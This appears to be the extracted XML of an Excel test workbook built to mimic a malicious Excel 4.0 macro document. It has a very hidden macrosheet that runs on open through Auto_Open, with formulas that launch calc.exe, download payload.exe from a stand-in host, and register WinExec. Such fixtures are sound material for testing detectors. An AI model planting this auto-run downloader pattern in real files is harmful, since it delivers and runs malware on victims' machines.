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macrosheets/sheet2.xml" ContentType="application/vnd.ms-excel.macrosheet+xml"/>
</Types>
</file>

<file path=_rels/.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
    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acro1" sheetId="2" r:id="rId2" state="veryHidden"/>
  </sheets>
  <definedNames>
    <definedName name="Auto_Open">Macro1!$A$1</definedName>
  </definedNames>
</workbook>
</file>

<file path=xl/_rels/workbook.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
    <Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/worksheet" Target="worksheets/sheet1.xml"/>
    <Relationship Id="rId2" Type="http://schemas.microsoft.com/office/2006/relationships/xlMacrosheet" Target="macrosheets/sheet2.xml"/>
</Relationships>
</file>

<file path=xl/macrosheets/sheet2.xml><?xml version="1.0" encoding="utf-8"?>
<worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">
  <sheetData>
    <row r="1">
      <c r="A1" t="inlineStr">
        <is>
          <t>EXCEL 4.0 MACRO (XLM) TEST</t>
        </is>
      </c>
    </row>
    <row r="2">
      <c r="A2" t="inlineStr">
        <is>
          <t>This workbook contains legacy Excel 4.0 macros</t>
        </is>
      </c>
    </row>
    <row r="3">
      <c r="A3" t="str">
        <f>=EXEC("calc.exe")</f>
        <v>XLM Macro 1</v>
      </c>
    </row>
    <row r="4">
      <c r="A4" t="str">
        <f>=CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"http://malicious-site.example.com/payload.exe","c:\temp\payload.exe",0,0)</f>
        <v>XLM Macro 2</v>
      </c>
    </row>
    <row r="5">
      <c r="A5" t="str">
        <f>=REGISTER("kernel32","WinExec","JJ","RunExe",1)</f>
        <v>XLM Macro 3</v>
      </c>
    </row>
  </sheetData>
</worksheet>
</file>

<file path=xl/worksheets/sheet1.xml><?xml version="1.0" encoding="utf-8"?>
<worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">
  <sheetData>
    <row r="1">
      <c r="A1" t="inlineStr">
        <is>
          <t>EXCEL 4.0 MACRO (XLM) TEST</t>
        </is>
      </c>
    </row>
    <row r="2">
      <c r="A2" t="inlineStr">
        <is>
          <t>This workbook contains legacy Excel 4.0 macros</t>
        </is>
      </c>
    </row>
    <row r="3">
      <c r="A3" t="str">
        <f>=EXEC("calc.exe")</f>
        <v>XLM Macro 1</v>
      </c>
    </row>
    <row r="4">
      <c r="A4" t="str">
        <f>=CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"http://malicious-site.example.com/payload.exe","c:\temp\payload.exe",0,0)</f>
        <v>XLM Macro 2</v>
      </c>
    </row>
    <row r="5">
      <c r="A5" t="str">
        <f>=REGISTER("kernel32","WinExec","JJ","RunExe",1)</f>
        <v>XLM Macro 3</v>
      </c>
    </row>
  </sheetData>
</worksheet>
</file>